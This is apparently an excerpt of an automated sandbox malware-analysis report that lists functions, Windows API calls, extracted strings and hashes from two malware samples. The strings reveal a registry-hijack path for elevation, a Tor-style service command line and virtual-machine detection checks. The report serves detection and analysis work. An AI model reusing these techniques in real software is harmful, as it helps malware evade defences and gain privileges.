                                                                                                                                                                                                                                                              • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: SystemTimelstrcpy
                                                                                                                                                                                                                                                              • String ID: #F@$#F@
                                                                                                                                                                                                                                                              • API String ID: 62757014-661595268
                                                                                                                                                                                                                                                              • Opcode ID: 51ea7a2b96f12d2a71fafa8dc15fe3291ff18b4f52a7aa0b0a757c860a58e1e8
                                                                                                                                                                                                                                                              • Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51ea7a2b96f12d2a71fafa8dc15fe3291ff18b4f52a7aa0b0a757c860a58e1e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F46D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00905257: malloc.MSVCRT ref: 0090525F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                                              • Opcode ID: 36b56b5e4384ba13abe14ae141d0212bab6192fe2a1ddf460b4795af489f13cc
                                                                                                                                                                                                                                                              • Instruction ID: 4762e09946d2c9139a6a7fc9dcbac40582aa2f771a68ec1f3dd2b02245488f02
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36b56b5e4384ba13abe14ae141d0212bab6192fe2a1ddf460b4795af489f13cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C321CCB1D00209ABDF14EFA4E845BDE7B75EF84360F114225FA25A72D0EB716A05CF91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FB4B7 Relevance: 5.3, APIs: 4, Instructions: 274stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FB6B4
                                                                                                                                                                                                                                                                • Part of subcall function 00905797: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009057B9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DB40), ref: 008FB6E2
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FB7BA
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FB7CE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2910778473-0
                                                                                                                                                                                                                                                              • Opcode ID: 4c841f1622f07f685f6db9995fa84ba6bb6fd9757794a01dbc2b5751afcccf63
                                                                                                                                                                                                                                                              • Instruction ID: c79e2c9cfda5519ed90b8f294f462c65583aa1f6d5e9118834cd98c54606a3dc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c841f1622f07f685f6db9995fa84ba6bb6fd9757794a01dbc2b5751afcccf63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9A1FBB1D042089ECF14EBE0DCA6EEEB339BF94714F504569F506A21D1EF746A48CB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00902BE7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00902C21
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 00902C3E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624DC4), ref: 00902C52
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 00902C64
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: wsprintfA.USER32 ref: 009027F0
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: FindFirstFileA.KERNEL32(?,?), ref: 00902807
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: StrCmpCA.SHLWAPI(?,0041D864), ref: 00902835
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: StrCmpCA.SHLWAPI(?,0041D868), ref: 0090284B
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: FindNextFileA.KERNEL32(000000FF,?), ref: 00902A20
                                                                                                                                                                                                                                                                • Part of subcall function 009027D7: FindClose.KERNEL32(000000FF), ref: 00902A35
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2667927680-0
                                                                                                                                                                                                                                                              • Opcode ID: 5d2293bb92b353d421a5094c8b8f6ff56762a29023f594da7c4d3e6856184f9a
                                                                                                                                                                                                                                                              • Instruction ID: cf60760189792418c6c5305c9f28733ef5528af5e9f131b409e65c520911895b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d2293bb92b353d421a5094c8b8f6ff56762a29023f594da7c4d3e6856184f9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F2187B6900608ABDB24FBA0DD46EEA733DAF94740F000585B75A961C0EE74A6C58FA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905BC7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1206339513-0
                                                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction ID: 2cd13de9e29a1ad83fb2e4cd66c22fc22dd879e922ac010eb7d8913290e67e3f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA015E75510508FFCB14DFA8D944EAE7B79FF48344F108548F90A9B340CA71AA40DF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 012027C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 012027EE
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0120280E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, Offset: 01202000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_1202000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: 09fb8b58e70f23d8b8093d412b431e12d436b7432d8a2caee8f0ad53bd1acfac
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93F0C235210312ABE7213BB8AC8CB6E76ECBF48625F10032AF742910C2DB70E9454661
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01202485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 13 1202485-12024bf call 1202798 16 12024c1-12024f4 VirtualAlloc call 1202512 13->16 17 120250d 13->17 19 12024f9-120250b 16->19 17->17 19->17
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 012024D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, Offset: 01202000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_1202000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction ID: e47b7bcf3b930dc08435c5b2bd2bb53539075579f920c6b56eb1891e965fffff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C112D79A00208EFDB01DF98C985E99BFF5AF08350F058095F9489B362D371EA50DB84
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000840000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000C77000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CCF000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CD3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CEF000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CF6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                                                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                                                                                                                              • Opcode ID: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000840000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000C77000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CCF000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CD3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CEF000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000010.00000002.3182375526.0000000000CF6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_VT4T5BrKWgz9d48cmEd8ePkZ.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                                                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                                                                                                                              • Opcode ID: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 011707C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
